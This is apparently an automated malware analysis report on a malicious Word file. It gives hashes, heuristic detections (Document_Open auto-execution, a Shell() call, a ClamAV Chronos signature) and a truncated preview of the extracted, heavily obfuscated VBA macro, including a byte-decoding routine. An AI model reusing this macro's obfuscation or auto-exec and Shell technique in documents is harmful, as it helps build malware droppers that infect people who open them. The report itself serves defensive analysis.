Office (OLE) malware analysis — malicious · 8855ee4ef4626102

MALICIOUS

Office (OLE)

146.0 KB Created: 2018-04-25 00:46:00 Authoring application: Microsoft Office Word First seen: 2019-02-26

MD5: 8a3fa97772ddaeedc3b8354f3cd1915a SHA-1: caf17f9aa107e21e72eb9a5c17e097614950ea3c SHA-256: 8855ee4ef462610215b1891c96029b6a213d079a7cbf4ffed7b690c525f33d97

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is configured to execute automatically via the Document_Open event and uses the Shell() function, indicating an intent to run external code. This is a common technique for downloading and executing further stages of malware. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' suggests this may be related to the Chronos ransomware family, but without more specific indicators, the family is classified as unknown.

Heuristics 6

ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22763 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22763 bytes
SHA-256: `663408b54d25645880e503e5195d7fbb493977997d06526f36a1c5799a822e70`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function fsaRHYW(VPMumzvU As String) As String While NFFOmk < 35 OavLstH = RTrim("w^ywLVd!cNY@xGNPOvg") XvkYFwpK = LTrim("t^DyiA($XR@s^") NFFOmk = NFFOmk + 1 Wend OavLstH = "MwRfq-RD SF" + "Ssf.DkhWdQ UedE." + "fPAtkXtbVO#ix" For CFhyVc = 0 To 108 JrOhp = Space(19) RSDnqZ = Space(5) XvkYFwpK = "xRyPMDdT?nP" + ")empssG#vmM^%r_$BR" + "mw)!bp)yOzq" eubodj = Right("gd#$C[lSTlR", 3) eubodj = LTrim("v]Jd[RKPUbC^") DyxwB = Right("Xpa-MD.ipWWHp", 3) JrOhp = Space(15) AuEcjY = 1247 - 1384 - 1211 Next CFhyVc eubodj = Right("%ax$NVSR(krRVDY", 3) AuEcjY = RTrim("y&MSFsDveMKHVFj?") Dim wpWxqw() As Byte While XIgrXd < 63 LcKqd = Right("Knt#M#iJ&B$Ou-d", 5) RSDnqZ = 1667 + 1368 + 1607 XfTRcuIQ = 1400 - 1320 - 1194 OavLstH = 493 + 759 + 1653 pWToUIW = Space(15) XIgrXd = XIgrXd + 1 Wend For mpXHDT = 0 To 202 DyxwB = LTrim("ES?m[lcjDQ") JrOhp = Left("I[bRLMzE&S.D_Ok", 5) LcKqd = LTrim("d ]PmWPc.javz") AuEcjY = Right("K#(.#y?QPZ", 2) pWToUIW = StrReverse("ZdT.mwKspthsH)pqs") OavLstH = LTrim("pjT]EXvtoB(MGi#dV-") OavLstH = StrReverse("KvFkVmPsrBPMU^bnX") JrOhp = Space(19) pWToUIW = LTrim("ZjPIlEr!!fuPYVXYUN)") Next mpXHDT AuEcjY = Right("u[^_CdyuEej)C?", 4) Dim fWUoV(512) As Byte eubodj = Space(14) LcKqd = 1265 + 148 + 531 While WitqFm < 47 RSDnqZ = Left("-jRfQtKz%t[mnWMdLD", 4) iGdXiA = LTrim("bQh[c.GLLjJgg?") JrOhp = Left("Ehh]riW?Y&oXxhkHzA[E", 2) DyxwB = Space(10) pWToUIW = StrReverse("Rrmx!tWlw]fW") WitqFm = WitqFm + 1 Wend While uraawA < 349 ghqaVX = UCase("?v]BpRbf@widqrD&%?$") pWToUIW = RTrim("$fMW.Vw^^feWD") uraawA = uraawA + 2 Wend DyxwB = 488 + 1667 + 545 Dim cGZGZN As Integer OavLstH = Space(1) LcKqd = UCase("?czYfv]-@v") cGZGZN = 0 XfTRcuIQ = RTrim("c)%oEyk^D F%CUM") iGdXiA = 554 + 1320 + 1301 wpWxqw = StrConv(VPMumzvU, vbFromUnicode) OavLstH = Left("aEKD%lf[-]", 4) For rpGEA = 0 To UBound(wpWxqw) - 1 ghqaVX = Right("pH?.sgxLRMjfc&!D", 3) If (rpGEA Mod 2 = 0) Then JrOhp = ")dLVQcizGm" + "MnmaiL@ysY?i(" + "RF(^bagSEmRzfH$]%R" fWUoV(cGZGZN) = wpWxqw(rpGEA) OavLstH = Left(")tsIPbnyG^XXO.HRl", 2) While vAAVbu < 90 OavLstH = "AqtFK]rarP]s&WZg^TAi" + "GTc(KbZXhke" + "lWUI?NLdUWw" XfTRcuIQ = 1799 + 470 + 1463 iGdXiA = UCase("kG iYChMxigLSou") ghqaVX = LTrim(" CiSF%@oTc-(Pp#t") RSDnqZ = "KVoFP-HHsx]hYxfv" + "tR[p(T ujD@-yo.m" + "(QBk iY?jLTGoGBBdf" OavLstH = StrReverse(")jhd$E&N-TgSM") JrOhp = Right("PUid^$kX[b)qM!", 2) pWToUIW = RTrim("ByHZNS_jQIJf_XDtud") vAAVbu = vAAVbu + 1 Wend cGZGZN = cGZGZN + 1 While teAUzC < 345 LcKqd = "wXAq.cS]Px.M&zHf" + "LKSiwX n_La" + "Y fYIkxEQ(Q s" pWToUIW = Right("#(c-fMV]SlP", 2) ghqaVX = Right("?eI]Q$gd.lDn j(DH&t", 2) ghqaVX = RTrim("!SSr(cY!SpvWfDT") LcKqd = 1894 + 1853 + 1459 pWToUIW = RTrim("wlAGryNfD._") RSDnqZ = Right("FAdgjFQfd[u yTnQ", 2) eubodj = Space(13) RSDnqZ = RTrim("C#ka[Ye%[_t") XvkYFwpK = UCase("]aLjiH_FmhxLnz") teAUzC = teAUzC + 2 Wend For uKtXdX = 0 To 381 iGdXiA = 511 - 1948 - 1047 ghqaVX = Right("^dx)#Iyf ... (truncated)

SHA-256: 663408b54d25645880e503e5195d7fbb493977997d06526f36a1c5799a822e70

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function fsaRHYW(VPMumzvU As String) As String
While NFFOmk < 35
    OavLstH = RTrim("w^ywLVd!cNY@xGNP*Ovg")
    XvkYFwpK = LTrim("t^DyiA($XR@s^")
    NFFOmk = NFFOmk + 1
Wend
OavLstH = "MwRfq-RD SF" + "Ssf.DkhWdQ UedE." + "fPAtk*XtbVO#ix"
For CFhyVc = 0 To 108
    JrOhp = Space(19)
    RSDnqZ = Space(5)
    XvkYFwpK = "xRyPMDdT?nP" + ")empssG#vmM^%r_$BR" + "mw)!bp)yOzq"
    eubodj = Right("gd#$C[lSTlR", 3)
    eubodj = LTrim("v]Jd[RKPUbC^")
    DyxwB = Right("Xpa-MD.ipWWHp", 3)
    JrOhp = Space(15)
    AuEcjY = 1247 - 1384 - 1211
Next CFhyVc
eubodj = Right("%ax$NVSR(krRVDY", 3)
AuEcjY = RTrim("y&MSFsDveMKHVFj?")
    Dim wpWxqw() As Byte
    While XIgrXd < 63
        LcKqd = Right("Knt#M#iJ&B$Ou-d", 5)
        RSDnqZ = 1667 + 1368 + 1607
        XfTRcuIQ = 1400 - 1320 - 1194
        OavLstH = 493 + 759 + 1653
        pWToUIW = Space(15)
        XIgrXd = XIgrXd + 1
    Wend
    For mpXHDT = 0 To 202
        DyxwB = LTrim("ES?m[lcjDQ")
        JrOhp = Left("I[bRLMzE&S.D_Ok", 5)
        LcKqd = LTrim("d ]PmWPc.javz")
        AuEcjY = Right("K#(.#y?QPZ", 2)
        pWToUIW = StrReverse("ZdT.mwKspt*hsH)pqs")
        OavLstH = LTrim("pjT]EXvtoB(MGi#dV-")
        OavLstH = StrReverse("KvFkVmPsrBPMU^bnX")
        JrOhp = Space(19)
        pWToUIW = LTrim("ZjPIlEr!!fuPYVXY*UN)")
    Next mpXHDT
    AuEcjY = Right("u[^_CdyuEej)C?", 4)
    Dim fWUoV(512) As Byte
    eubodj = Space(14)
    LcKqd = 1265 + 148 + 531
    While WitqFm < 47
        RSDnqZ = Left("-jRfQtKz%t[mnWMdLD", 4)
        iGdXiA = LTrim("bQh[c.GLLj*Jgg?")
        JrOhp = Left("Ehh]riW?Y&oXxhkHzA[E", 2)
        DyxwB = Space(10)
        pWToUIW = StrReverse("Rrmx!tWlw]fW")
        WitqFm = WitqFm + 1
    Wend
    While uraawA < 349
        ghqaVX = UCase("?v]BpRbf@wid*qrD&%?$")
        pWToUIW = RTrim("$fMW.Vw^^feWD")
        uraawA = uraawA + 2
    Wend
    DyxwB = 488 + 1667 + 545
    Dim cGZGZN As Integer
    OavLstH = Space(1)
    LcKqd = UCase("?czYfv]-@v")
    cGZGZN = 0
    XfTRcuIQ = RTrim("c)%oEyk^D F%CUM")
    iGdXiA = 554 + 1320 + 1301
    wpWxqw = StrConv(VPMumzvU, vbFromUnicode)
    OavLstH = Left("aEKD%lf[-*]", 4)
    For rpGEA = 0 To UBound(wpWxqw) - 1
    ghqaVX = Right("pH?.sgxLRMjfc&!*D", 3)
        If (rpGEA Mod 2 = 0) Then
        JrOhp = ")dLVQcizGm" + "MnmaiL@ysY?i(" + "RF(^bagSEmRzfH$]%R"
            fWUoV(cGZGZN) = wpWxqw(rpGEA)
            OavLstH = Left(")t*sIPbnyG^XXO.HRl", 2)
            While vAAVbu < 90
                OavLstH = "AqtFK]rarP]s&WZg^TAi" + "GTc(KbZXhke" + "lWUI?NLdUWw"
                XfTRcuIQ = 1799 + 470 + 1463
                iGdXiA = UCase("kG iYChMxigLSou")
                ghqaVX = LTrim(" CiSF%@oTc-(Pp#t")
                RSDnqZ = "KVoFP-HHsx]hYxfv" + "tR[p(T ujD*@-yo.m" + "(QBk iY?jLTGoGBB*df"
                OavLstH = StrReverse(")jhd$E&N-TgSM")
                JrOhp = Right("PUid^$kX[b)qM!", 2)
                pWToUIW = RTrim("ByHZNS_jQIJf_XDtud")
                vAAVbu = vAAVbu + 1
            Wend
            cGZGZN = cGZGZN + 1
            While teAUzC < 345
                LcKqd = "wXAq.cS]Px.M&zHf" + "LKSiwX n_La" + "Y fYIkxEQ(Q s"
                pWToUIW = Right("#(c-fMV]SlP", 2)
                ghqaVX = Right("?eI]Q$gd.lDn j(DH&t", 2)
                ghqaVX = RTrim("!SSr(cY!S*pvWfDT")
                LcKqd = 1894 + 1853 + 1459
                pWToUIW = RTrim("wlAGryNfD._")
                RSDnqZ = Right("FAdgjFQfd[u yTnQ", 2)
                eubodj = Space(13)
                RSDnqZ = RTrim("C#ka[Ye%[_t")
                XvkYFwpK = UCase("]aLjiH_FmhxLnz")
                teAUzC = teAUzC + 2
            Wend
            For uKtXdX = 0 To 381
                iGdXiA = 511 - 1948 - 1047
                ghqaVX = Right("^dx)#Iyf
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.